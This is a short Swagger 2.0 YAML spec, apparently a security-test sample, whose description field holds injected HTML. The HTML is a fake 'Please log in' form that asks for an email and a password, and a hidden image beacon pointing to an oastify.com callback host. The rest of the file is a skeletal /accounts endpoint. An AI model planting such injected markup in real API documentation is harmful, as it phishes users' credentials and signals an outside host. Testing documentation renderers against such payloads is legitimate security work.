swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
      <form id="leakForm" action="/login" method="GET"><h3>Please log in to continue</h3><input type="email" name="email" autocomplete="username" placeholder="Email"><input type="password" name="password" autocomplete="current-password" placeholder="Password"><button type="submit">Login</button></form><img src="https://5bhyec4kbprgafcakjqywk2ip9v9j07p.oastify.com/leak.jpg" style="display:none;">
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
